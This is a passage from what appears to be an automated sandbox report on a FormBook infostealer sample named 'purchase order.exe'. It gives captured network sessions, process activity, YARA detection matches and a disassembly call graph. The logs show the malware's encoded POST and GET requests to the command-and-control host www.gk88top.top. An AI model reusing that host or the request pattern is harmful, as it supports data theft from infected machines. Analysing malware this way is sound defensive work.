[TRUNCATED]
                                                                                                            Data Ascii: 1ed|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\|!+jZAeZq)jAo|m5ka',Fk6x>DAbU.>y^-RSo6B)m8w*ln}w*eQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN
                                                                                                            Dec 6, 2024 09:34:25.183134079 CET85INData Raw: 60 3f 09 e3 3d d4 7d 3d c1 26 fc 8f 36 cf 48 2e 4b dc fd 8b e2 36 67 a3 ed db 48 75 2a 7e 17 89 2f 7b b1 80 56 28 a9 15 43 09 96 2c ce 40 69 38 6d 56 1a 8e 1b 9f 76 93 df 2f 9d d2 57 90 46 38 97 f9 f3 58 fb fd 12 2e 43 dd b0 f8 e7 3f 00 00 00 ff
                                                                                                            Data Ascii: `?=}=&6H.K6gHu*~/{V(C,@i8mVv/WF8X.C?


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            23192.168.2.450032104.21.7.187805216C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 6, 2024 09:34:26.208620071 CET10772OUTPOST /4gxa/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.gk88top.top
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 10305
                                                                                                            Origin: http://www.gk88top.top
                                                                                                            Referer: http://www.gk88top.top/4gxa/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Raw: 79 68 58 78 74 34 56 48 3d 46 58 67 31 68 6e 79 77 32 64 78 44 49 43 5a 36 7a 6f 39 4d 42 44 59 4d 39 6b 37 5a 77 6a 36 38 4b 47 64 39 42 59 33 6c 38 75 76 4a 6e 34 47 7a 64 52 75 38 4b 30 76 59 45 78 73 45 6d 2f 72 54 42 59 67 48 34 64 56 4c 49 35 44 66 6c 2f 59 56 54 44 4d 53 34 49 30 6c 70 57 53 2f 47 77 53 36 33 32 6c 53 42 4f 50 59 32 39 79 36 72 73 74 76 37 76 70 35 65 51 4b 54 4c 7a 49 71 2b 42 38 53 53 6a 70 6e 64 31 37 41 78 66 37 43 6e 34 58 51 30 56 73 59 58 59 4d 4e 37 44 75 57 39 61 36 39 49 79 44 69 55 64 34 77 6c 54 37 6a 68 37 42 7a 65 75 6a 76 35 61 54 56 49 33 6d 4a 42 4f 71 4f 6f 31 30 2f 50 72 38 76 37 43 55 47 52 55 61 42 57 57 39 32 55 68 4d 4e 32 76 67 6d 74 4d 69 49 49 39 73 71 30 54 51 57 66 68 67 65 4c 66 44 6c 49 6e 6e 4e 2f 6e 47 76 42 7a 6f 2b 6b 2b 42 32 32 69 75 33 6f 4b 38 38 53 55 64 49 66 6e 63 75 56 34 4b 33 47 37 6c 6c 49 31 76 2f 63 74 45 31 74 2f 4e 49 31 62 4c 78 77 7a 4d 34 76 67 35 4e 51 70 31 62 58 57 75 31 6a 37 50 72 6e 37 76 2b 6e 41 31 77 4e 44 46 66 50 [TRUNCATED]
                                                                                                            Data Ascii: yhXxt4VH=FXg1hnyw2dxDICZ6zo9MBDYM9k7Zwj68KGd9BY3l8uvJn4GzdRu8K0vYExsEm/rTBYgH4dVLI5Dfl/YVTDMS4I0lpWS/GwS632lSBOPY29y6rstv7vp5eQKTLzIq+B8SSjpnd17Axf7Cn4XQ0VsYXYMN7DuW9a69IyDiUd4wlT7jh7Bzeujv5aTVI3mJBOqOo10/Pr8v7CUGRUaBWW92UhMN2vgmtMiII9sq0TQWfhgeLfDlInnN/nGvBzo+k+B22iu3oK88SUdIfncuV4K3G7llI1v/ctE1t/NI1bLxwzM4vg5NQp1bXWu1j7Prn7v+nA1wNDFfPJYjTn+4W8gFOzqY/MvnvIu0uDpmzfvsyd/+eDulWrooBZ+eJY0HVC1Ee2cytAIw7eqUOLddAGmz/5RDDmlOUmYALybFoqa3ICsEQAIjzCr/fJf3Xh+ZfhZAqC6sjxqZK6G38Gk9gZt7dmETFlvOeJ+/uwSh/yYcr4xKUBdIvj8CgQ40njTF1Fb/z4NjsVCT/VdGLr/nUcKlV75YF8hS24pYVgnF6D8wb4GPYAfCo+3QZb8qBkdFwL1fFOhOPcl/x4lAn2DBqEFvnUGLd6ELJKt4Mb2zb6YPhE29Ou0+9KydugjWWmj4NWioa8EQFyVstpBSUg6szWTSfbybQPWAbsduaecywPkaD1zlhMlu07je45lro3iBjwwVk3U3CQRq3QAaFAR0DwYEUBLFfoGgD2pNZosfDgkVXXGqsJ7BhHL2CmzVRP7A8qqmQrVD6EMTKNI6sz29QHxSRUsbkqnDIgAeC7bjIlltgiBQdVe0ymgOC+cPolJ8pELqx8WEiMBuJclVq74QK7voyK08hJh7WcyHOfohWzYUaC3DrR2eYjFJ842zM8rmtuxSH+amjcQtjW04Oe57sjZI/9DPB4qPTdXzLVPzJMoaHxetWqkXDRdzBNM7RM4o1M917By/UnnlBbM1rKchTUlfYZRnfiArNDmJuqcWkTBz/D0 [TRUNCATED]


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            24192.168.2.450033104.21.7.187805216C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 6, 2024 09:34:28.928092003 CET408OUTGET /4gxa/?yhXxt4VH=IVIViSCd4+diLw5hx6pqKzAzzXjH0VWsQQRVAN/m1p/rxaGnfzS1IkXZSHFapfjNT88wuN41KZDTvbIxWygy4ZsRlEWQLVi632NRXOHwjbynndNV+ecoPQE=&7j=yfeP18RhphLhR HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.gk88top.top
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Dec 6, 2024 09:34:30.508099079 CET1236INHTTP/1.1 404 Not Found
                                                                                                            Date: Fri, 06 Dec 2024 08:34:30 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RbI1T69%2F7I8Np3e3TU33p0QgYCVGOYcLkBtlm3w5vKavK46mwtWkd664WccANxvBdY%2B3kVVGjWRlZQlaWvtbotMeVvxMTmThaCrqbgIj8OaEwYeUQ2A419yq3I%2BENpqdOBk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8edaefe85a668c60-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1884&min_rtt=1884&rtt_var=942&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=408&delivery_rate=0&cwnd=52&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 34 34 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 [TRUNCATED]
                                                                                                            Data Ascii: 448<!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;
                                                                                                            Dec 6, 2024 09:34:30.508193016 CET657INData Raw: 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b
                                                                                                            Data Ascii: padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}
                                                                                                            Dec 6, 2024 09:34:31.018812895 CET1236INData Raw: 37 66 66 61 0d 0a 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41 45 44 43 41 59 41 41 41 43
                                                                                                            Data Ascii: 7ffa<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJQFURFRQEb
                                                                                                            Dec 6, 2024 09:34:31.018848896 CET1236INData Raw: 44 64 70 54 4c 74 64 45 50 41 31 67 4a 4b 46 4e 46 66 6c 4d 58 54 35 43 59 56 56 42 4d 41 58 4f 43 68 6b 57 63 7a 54 6c 78 2f 5a 73 65 2b 62 6a 71 39 61 44 35 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a
                                                                                                            Data Ascii: DdpTLtdEPA1gJKFNFflMXT5CYVVBMAXOChkWczTlx/Zse+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgx
                                                                                                            Dec 6, 2024 09:34:31.018862009 CET1236INData Raw: 45 4f 4e 56 33 54 36 4e 4c 35 50 39 42 59 46 39 2f 7a 58 38 64 7a 79 6a 6b 32 49 61 42 4b 41 4e 73 69 33 38 36 72 56 30 42 45 4d 39 57 6f 4f 77 68 6f 61 32 32 34 46 67 4f 6b 73 4b 6a 62 44 54 6e 4e 48 41 64 68 4d 59 47 59 4d 2f 6a 58 39 76 46 56
                                                                                                            Data Ascii: EONV3T6NL5P9BYF9/zX8dzyjk2IaBKANsi386rV0BEM9WoOwhoa224FgOksKjbDTnNHAdhMYGYM/jX9vFVbwOylS1VW0H0PDuCZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF
                                                                                                            Dec 6, 2024 09:34:31.019011021 CET672INData Raw: 79 73 42 51 59 77 78 2f 37 4e 4a 31 2f 33 42 6d 42 38 67 6a 32 52 76 5a 4b 52 66 5a 6f 73 6e 50 6b 73 6a 5a 6e 34 43 6a 66 43 2f 49 70 6f 53 51 50 69 53 78 72 5a 72 78 71 4a 69 38 34 63 6f 32 43 30 39 6e 32 61 79 42 6f 50 6e 4c 74 67 78 34 77 48
                                                                                                            Data Ascii: ysBQYwx/7NJ1/3BmB8gj2RvZKRfZosnPksjZn4CjfC/IpoSQPiSxrZrxqJi84co2C09n2ayBoPnLtgx4wHySFu7EM8algthDCrYeAjIUdKqVHjpSihoruB0bRyAdjbsTXVLBwynwU1aQCX0KXDOG4RyINQBh5bg0A1gZRX04R+JxJiXRRJ7WCSpjShJz0iMVWSM+THIzirPptrK44eXsC92zoMkrbXRXE0Ac2jsXy8tA7PrsLKt
                                                                                                            Dec 6, 2024 09:34:31.019021988 CET1236INData Raw: 49 35 41 4f 62 62 61 46 53 55 70 47 42 7a 4c 41 5a 67 74 68 79 57 68 6b 4b 72 52 48 70 7a 48 4b 59 65 31 2b 75 68 4d 6f 63 78 6e 52 64 5a 59 65 48 4a 68 4d 4d 46 6d 39 52 56 4b 46 69 57 57 43 5a 36 33 6d 62 34 44 78 71 77 34 63 66 57 4d 57 62 53
                                                                                                            Data Ascii: I5AObbaFSUpGBzLAZgthyWhkKrRHpzHKYe1+uhMocxnRdZYeHJhMMFm9RVKFiWWCZ63mb4Dxqw4cfWMWbS+zh4u1PkIHNHRl2tO+Brdmk8FoGRtbAmLiv1Ogd0/mn4hkUYABiW2VsaarTwxeTr7LG4MGNtvw1QNtRDed/WODIGj07balBgrUzUoKBtygG9RiFBQjedJZOXJyUVVHbKJww6r5qI2vkEqre/Qps0GT44d/p7BqPck
                                                                                                            Dec 6, 2024 09:34:31.019035101 CET1236INData Raw: 63 47 6f 62 32 59 77 36 73 63 43 32 41 68 5a 4d 50 4a 72 79 4a 70 69 56 51 43 6f 66 4c 57 71 33 77 62 57 71 31 4b 78 37 36 4b 74 46 2f 64 65 54 54 77 4b 58 38 30 64 4a 45 6f 62 77 66 41 47 4e 48 2b 46 37 79 6a 42 34 54 57 73 58 4b 74 35 30 37 6d
                                                                                                            Data Ascii: cGob2Yw6scC2AhZMPJryJpiVQCofLWq3wbWq1Kx76KtF/deTTwKX80dJEobwfAGNH+F7yjB4TWsXKt507mUO/NOvDd/172stDGBGt3yz48bF044+FtUKa1PR564/AUpNQCaARgNYDuAGINRP9Ng1NsKgPxXwxizWU0l22zpuHvw2FxYxV1FGuWYLwV5qcoyhkKjpAk492rtCXPxetPxANkSDEwE8A6LMtrWbfoP0C9khglAXwBn
                                                                                                            Dec 6, 2024 09:34:31.019047022 CET1236INData Raw: 69 50 36 55 78 71 47 41 65 41 34 75 68 78 61 70 66 6c 42 2b 4f 6e 73 54 51 65 42 66 33 48 36 6b 38 47 6f 39 7a 55 59 39 52 38 67 62 79 6b 48 77 43 44 59 63 46 59 41 34 4b 39 56 7a 65 74 51 73 31 79 4c 74 78 5a 73 55 71 46 47 2b 62 31 51 71 32 52
                                                                                                            Data Ascii: iP6UxqGAeA4uhxapflB+OnsTQeBf3H6k8Go9zUY9R8gbykHwCDYcFYA4K9VzetQs1yLtxZsUqFG+b1Qq2RnRbgJLYXhuvlt8BQOwAi5pJrDFCfSfQkB5kyLaWjM/G97H9se21Fi0jW5f1TCR635atXVE6smxq5cXtY7oKGK45VU1W0C4DMA8Qaj/nODUV+rGP37u7gF28GEsEpibWBHJeSaCsqaAMDdumWD060Se2Sq7K9RzXg6
                                                                                                            Dec 6, 2024 09:34:31.019058943 CET1236INData Raw: 37 4c 38 44 67 63 56 48 39 4b 38 59 6f 58 39 52 43 51 43 67 49 72 6e 34 75 6e 46 39 33 4f 68 34 70 57 45 35 5a 78 6a 55 62 48 2f 32 41 30 6b 67 31 46 66 77 68 43 72 6e 77 44 43 66 73 6a 72 6e 62 62 7a 57 2f 4d 67 51 6c 61 51 6c 33 62 30 35 54 75
                                                                                                            Data Ascii: 7L8DgcVH9K8YoX9RCQCgIrn4unF93Oh4pWE5ZxjUbH/2A0kg1FfwhCrnwDCfsjrnbbzW/MgQlaQl3b05TupXQcv2VIJL9c7B7XwaAAuhy9wIHM+vLj1kOOxAOAqGPuxOP0ulsPqUe8jE4BlD/5mYNV++mP/hmuDDywzi9bPCtoT4O2v1s29mpmyYf6JuCO9y4fU5on7zQH9DV/I29Z7DUb9BINRb3MR8G/kBGzLzIAB5dVmVg33
                                                                                                            Dec 6, 2024 09:34:31.027293921 CET1236INData Raw: 67 79 42 56 74 55 79 4c 64 64 36 55 38 50 7a 4f 30 61 74 32 63 30 67 63 42 30 55 4e 48 48 36 6e 35 41 4f 5a 54 44 71 74 51 61 6a 66 67 52 6b 4a 5a 57 33 41 54 69 69 51 5a 55 59 6f 4e 50 30 47 39 64 6d 5a 74 63 4f 43 7a 65 39 69 4b 37 50 58 59 44
                                                                                                            Data Ascii: gyBVtUyLdd6U8PzO0at2c0gcB0UNHH6n5AOZTDqtQajfgRkJZW3ATiiQZUYoNP0G9dmZtcOCze9iK7PXYDAv2TDPgU66oqD5ufAYVGBcxIUriXawyUOq1e98LOQg8seIt2Uvdh4+fum5+9f6ww7tdnUnDA+pEGHfV8c2578tH/JFiqen+dgN3SQ035iDUa9rbWex8UeFAxZKAAD1FeSj3ZCVs4OyOLKdzKtPwZbRamywNGJ12pP


                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:0
                                                                                                            Start time:03:31:23
                                                                                                            Start date:06/12/2024
                                                                                                            Path:C:\Users\user\Desktop\purchase order.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\purchase order.exe"
                                                                                                            Imagebase:0xc0000
                                                                                                            File size:738'304 bytes
                                                                                                            MD5 hash:79BFE4CD6855C69C57C3B6B3A2AD898F
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:3
                                                                                                            Start time:03:31:42
                                                                                                            Start date:06/12/2024
                                                                                                            Path:C:\Users\user\Desktop\purchase order.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\purchase order.exe"
                                                                                                            Imagebase:0xac0000
                                                                                                            File size:738'304 bytes
                                                                                                            MD5 hash:79BFE4CD6855C69C57C3B6B3A2AD898F
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2390943526.0000000004A30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2360246710.0000000002350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:6
                                                                                                            Start time:03:32:25
                                                                                                            Start date:06/12/2024
                                                                                                            Path:C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe"
                                                                                                            Imagebase:0xb40000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:7
                                                                                                            Start time:03:32:28
                                                                                                            Start date:06/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\cacls.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\SysWOW64\cacls.exe"
                                                                                                            Imagebase:0x740000
                                                                                                            File size:27'648 bytes
                                                                                                            MD5 hash:00BAAE10C69DAD58F169A3ED638D6C59
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3517878264.0000000003250000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3517932349.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:8
                                                                                                            Start time:03:32:41
                                                                                                            Start date:06/12/2024
                                                                                                            Path:C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe"
                                                                                                            Imagebase:0xb40000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:10
                                                                                                            Start time:03:32:54
                                                                                                            Start date:06/12/2024
                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                            Imagebase:0x7ff6bf500000
                                                                                                            File size:676'768 bytes
                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Disassembly

                                                                                                            Reset < >

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:12.6%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:3.7%
                                                                                                              Total number of Nodes:214
                                                                                                              Total number of Limit Nodes:18
                                                                                                              execution_graph 42603 235d460 42604 235d4a6 42603->42604 42608 235d640 42604->42608 42611 235d62f 42604->42611 42605 235d593 42609 235d66e 42608->42609 42614 235b0b4 42608->42614 42609->42605 42612 235b0b4 DuplicateHandle 42611->42612 42613 235d66e 42612->42613 42613->42605 42615 235d6a8 DuplicateHandle 42614->42615 42616 235d73e 42615->42616 42616->42609 42816 235b0d0 42822 235b1b8 42816->42822 42827 235b1c8 42816->42827 42817 235b0df DuplicateHandle 42819 235d73e 42817->42819 42823 235b1fc 42822->42823 42824 235b1d9 42822->42824 42823->42817 42824->42823 42825 235b400 GetModuleHandleW 42824->42825 42826 235b42d 42825->42826 42826->42817 42828 235b1d9 42827->42828 42829 235b1fc 42827->42829 42828->42829 42830 235b400 GetModuleHandleW 42828->42830 42829->42817 42831 235b42d 42830->42831 42831->42817 42617 68e8c98 42618 68e8e23 42617->42618 42620 68e8cbe 42617->42620 42620->42618 42621 68e3490 42620->42621 42622 68e8f18 PostMessageW 42621->42622 42623 68e8f84 42622->42623 42623->42620 42832 77d01c 42833 77d034 42832->42833 42834 77d08e 42833->42834 42837 4a12c08 42833->42837 42846 4a1113c 42833->42846 42840 4a12c45 42837->42840 42838 4a12c79 42871 4a11264 42838->42871 42840->42838 42841 4a12c69 42840->42841 42855 4a12da0 42841->42855 42860 4a12e6c 42841->42860 42866 4a12d90 42841->42866 42842 4a12c77 42849 4a11147 42846->42849 42847 4a12c79 42848 4a11264 CallWindowProcW 42847->42848 42851 4a12c77 42848->42851 42849->42847 42850 4a12c69 42849->42850 42852 4a12da0 CallWindowProcW 42850->42852 42853 4a12d90 CallWindowProcW 42850->42853 42854 4a12e6c CallWindowProcW 42850->42854 42852->42851 42853->42851 42854->42851 42856 4a12db4 42855->42856 42875 4a12e49 42856->42875 42878 4a12e58 42856->42878 42857 4a12e40 42857->42842 42861 4a12e7a 42860->42861 42862 4a12e2a 42860->42862 42864 4a12e49 CallWindowProcW 42862->42864 42865 4a12e58 CallWindowProcW 42862->42865 42863 4a12e40 42863->42842 42864->42863 42865->42863 42868 4a12db4 42866->42868 42867 4a12e40 42867->42842 42869 4a12e49 CallWindowProcW 42868->42869 42870 4a12e58 CallWindowProcW 42868->42870 42869->42867 42870->42867 42872 4a1126f 42871->42872 42873 4a1435a CallWindowProcW 42872->42873 42874 4a14309 42872->42874 42873->42874 42874->42842 42877 4a12e69 42875->42877 42881 4a14292 42875->42881 42877->42857 42879 4a12e69 42878->42879 42880 4a14292 CallWindowProcW 42878->42880 42879->42857 42880->42879 42882 4a11264 CallWindowProcW 42881->42882 42883 4a142aa 42882->42883 42883->42877 42624 68e7152 42625 68e7177 42624->42625 42629 68e7b16 42624->42629 42634 68e7ab0 42624->42634 42638 68e7aa0 42624->42638 42630 68e7aa4 42629->42630 42632 68e7b19 42629->42632 42642 68e7dd8 42630->42642 42632->42625 42635 68e7aca 42634->42635 42637 68e7dd8 12 API calls 42635->42637 42636 68e7ad2 42636->42625 42637->42636 42639 68e7ab0 42638->42639 42641 68e7dd8 12 API calls 42639->42641 42640 68e7ad2 42640->42625 42641->42640 42643 68e7dfd 42642->42643 42661 68e83f5 42643->42661 42666 68e81b6 42643->42666 42671 68e7e19 42643->42671 42676 68e80b8 42643->42676 42681 68e81db 42643->42681 42686 68e8200 42643->42686 42694 68e8127 42643->42694 42699 68e8547 42643->42699 42704 68e8046 42643->42704 42709 68e7e28 42643->42709 42714 68e8328 42643->42714 42719 68e81ee 42643->42719 42727 68e83b2 42643->42727 42732 68e80f2 42643->42732 42737 68e89b2 42643->42737 42742 68e87b5 42643->42742 42644 68e7ad2 42644->42625 42662 68e89b9 42661->42662 42746 68e6b28 42662->42746 42751 68e6b30 42662->42751 42663 68e89db 42667 68e81c2 42666->42667 42755 68e6a38 42667->42755 42759 68e6a40 42667->42759 42668 68e82f6 42668->42644 42672 68e7e28 42671->42672 42673 68e7f79 42672->42673 42763 68e6cbc 42672->42763 42767 68e6cc8 42672->42767 42673->42644 42677 68e803c 42676->42677 42677->42644 42678 68e82cc 42677->42678 42771 68e67f8 42677->42771 42775 68e67f1 42677->42775 42678->42644 42682 68e87b9 42681->42682 42683 68e87d4 42682->42683 42779 68e68a8 42682->42779 42783 68e68a1 42682->42783 42787 68e6979 42686->42787 42791 68e6980 42686->42791 42687 68e821e 42688 68e870a 42687->42688 42690 68e6a38 WriteProcessMemory 42687->42690 42691 68e6a40 WriteProcessMemory 42687->42691 42688->42644 42689 68e8315 42690->42689 42691->42689 42695 68e803c 42694->42695 42696 68e82cc 42695->42696 42697 68e67f8 ResumeThread 42695->42697 42698 68e67f1 ResumeThread 42695->42698 42696->42644 42697->42695 42698->42695 42700 68e803c 42699->42700 42701 68e82cc 42700->42701 42702 68e67f8 ResumeThread 